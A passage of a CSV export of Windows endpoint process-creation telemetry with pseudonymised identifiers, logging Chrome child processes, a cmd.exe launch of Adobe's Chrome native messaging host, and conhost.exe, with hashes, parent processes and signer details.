10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.898686+00:00,2021-06-24 11:01:03.768971800+00:00,d2e64e24-3d7c-4d66-adce-9de12da79f53,computerpii_0a470890c60768167990033d701e7bd881398861,179433,False,10.7740.19041.1052,False,11540474045177854,,11540474045177860,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+894,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:29.833467800+00:00,13892,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3040 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.899179400+00:00,2021-06-24 11:01:03.769006600+00:00,b80e6908-d061-4cdc-8faf-c294085c6288,computerpii_0a470890c60768167990033d701e7bd881398861,179434,False,10.7740.19041.1052,False,11540474045177854,,11540474045177861,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+895,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:29.916273900+00:00,7392,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.903628400+00:00,2021-06-24 11:01:03.769039700+00:00,6589bb7c-9886-4390-9932-fbbbb9f82f5b,computerpii_0a470890c60768167990033d701e7bd881398861,179435,False,10.7740.19041.1052,False,11540474045177854,,11540474045177862,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+896,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:30.088578700+00:00,10928,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.914277800+00:00,2021-06-24 11:01:03.769072300+00:00,7cb4225b-c0b9-411e-abf2-dde2669e9523,computerpii_0a470890c60768167990033d701e7bd881398861,179436,False,10.7740.19041.1052,False,11540474045177854,,11540474045177863,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+897,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:30.221686900+00:00,8940,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.924996800+00:00,2021-06-24 11:01:03.769139400+00:00,155c4dfb-2ff0-4ac6-b331-2f353959ac9a,computerpii_0a470890c60768167990033d701e7bd881398861,179438,False,10.7740.19041.1052,False,11540474045177854,,11540474045177865,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+898,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:30.417929800+00:00,1728,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.35b2d30c41b6164d > \\.\pipe\chrome.nativeMessaging.out.35b2d30c41b6164d",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.929113500+00:00,2021-06-24 11:01:03.769243300+00:00,e4510984-715f-4b60-92b5-1ab86af13c1a,computerpii_0a470890c60768167990033d701e7bd881398861,179440,False,10.7740.19041.1052,False,11540474045177854,,11540474045177867,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,2176,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+899,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:30.447514300+00:00,9512,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:30.417929800+00:00,1728,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.35b2d30c41b6164d > \\.\pipe\chrome.nativeMessaging.out.35b2d30c41b6164d",False,2021-06-24 10:59:28.981045+00:00,10072,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.930064400+00:00,2021-06-24 11:01:03.769278300+00:00,912d8b07-eae7-467c-84bc-261b02254ba0,computerpii_0a470890c60768167990033d701e7bd881398861,179441,False,10.7740.19041.1052,False,11540474045177867,,11540474045177868,2021-06-24 10:59:30.417929800+00:00,1728,2021-06-24 10:59:30.417929800+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,1728,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 10:59:30.485947200+00:00,2021-02-17 04:34:58.875918800+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+900,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:30.533691600+00:00,1724,WCChromeNativeMessagingHost.exe,"""WCChromeNativeMessagingHost.exe""  chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 ",PortableExecutable,2021-05-28 05:59:00+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe,171232,4b700f688d0bf07dc2f7cfc658378a01,f2399c9999ba49e7952598df3f95d3854ee69357cc9073b5e54c63a5f7861862,990df54a9fd6c438d31522aecefc71ea0f04f869,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:30.417929800+00:00,1728,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.35b2d30c41b6164d > \\.\pipe\chrome.nativeMessaging.out.35b2d30c41b6164d",False,2021-06-24 10:59:28.981045+00:00,10072,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.937403900+00:00,2021-06-24 11:01:03.769313100+00:00,d9ac0af7-b405-4501-b023-028bd2dc2419,computerpii_0a470890c60768167990033d701e7bd881398861,179442,False,10.7740.19041.1052,False,11540474045177867,,11540474045177869,2021-06-24 10:59:30.417929800+00:00,1728,2021-06-24 10:59:30.417929800+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,1728,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 10:59:30.485947200+00:00,2021-02-17 04:34:58.875918800+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,,0.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Adobe Systems Inc.,Adobe Create PDF,21.5.20048.436468,,WCChromeNativeMessagingHost.exe,Adobe Create PDF plug-in listener for Chrome
+901,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:30.812117200+00:00,9780,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.950814600+00:00,2021-06-24 11:01:03.769347+00:00,4ef71fb0-acef-4a5a-8539-e4f252fef9d3,computerpii_0a470890c60768167990033d701e7bd881398861,179443,False,10.7740.19041.1052,False,11540474045177854,,11540474045177870,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,18560,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+902,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:30.906640100+00:00,14912,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5472 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.955429100+00:00,2021-06-24 11:01:03.769413300+00:00,8aa45ce3-a938-4633-a812-3232d8d2f6c3,computerpii_0a470890c60768167990033d701e7bd881398861,179445,False,10.7740.19041.1052,False,11540474045177854,,11540474045177872,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,18560,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
